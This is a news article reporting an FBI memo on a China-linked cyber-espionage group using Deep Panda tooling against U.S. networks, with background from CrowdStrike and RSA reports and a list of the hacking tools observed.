Ongoing investigations by the FBI have revealed a group that has been compromising personal and sensitive business information from U.S. commercial and government networks in recent weeks.
In a memo sent to security leaders and community insiders, the agency warns that the data breaches were done "through cyber espionage" and that the tools used were the same ones leveraged by the group known as Deep Panda.
"Analysis of the malware samples indicate a significant amount of the computer network exploitation activities emanated from infrastructure located within China. The tools used in the attack were referenced in open source reports on Deep Panda. This group has previously used Adobe Flash zero-day exploits in order to gain initial access to victim networks. Information obtained from victims indicated that PII [Personally Identifiable Information] was a priority target."
The memo goes on to note that compromised PII has been used in other instances to target or otherwise facilitate other malicious activities such as financial fraud, but the group behind the FBI's latest investigations are not taking this approach.
"This group uses a wide variety of tools including generic hacking utilities in order to gain access, establish persistent network access, and move laterally though the victim network," the memo adds.
Attempts to get a better understanding of the situation by Salted Hash were less than productive, as the FBI does not comment on active investigations.
In 2013, Deep Panda (also known as Shell_Crew or KungFu Kittens,) was the subject of a CrowdStrike report. CrowdStrike first took notice of the group in 2011, after they were hired to investigate an attack at a large Fortune 500 company. Based on additional research, they were able to determine that the group was connected to attacks targeting the Defense, Energy/Power, and Chemical Industries in the US and Japan.
"All of these samples reflect common tool marks and tradecraft consistent with Chinese based actors who target various strategic interests of the United States including High Tech/Heavy Industry, Non-Governmental Organizations (NGOs), State/Federal Government, Defense Industrial Base (DIB), and organizations with vast economic interests," the CrowdStrike report said at the time.
A year later, working on behalf of their own clients, RSA Security published a detailed report on Deep Panda, mirroring some of the details from the CrowdStrike data, but augmenting it with updated details on the vulnerabilities and RAT (Remote Access Trojan) tools used.
While the FBI's memo isn't too detailed, the point is seems to be that this group is still operational. They're motivated to obtain access and information, and in at least one case, they've been successful.
However, the tools being used are generic, so on some level there is a good chance that an attack could be detected and mitigated quickly. However, this group is known for taking their time and remaining silent while they sit on the line.
The memo highlights Mimikatz, ScanLine, HTran, PwDump, and gsecdump, as some of the more commonly available tools being used during attacks. In addition, the group is using the InfoAdmin RAT (Trojan.Kakfum) for remote access and exfiltration. In each case, all tools have been observed in both 32-bit and 64-bit builds.
"The presence of such tools should be immediately flagged if detected, reported to the FBI CYWATCH, and given priority enhanced mitigation," the memo encourages.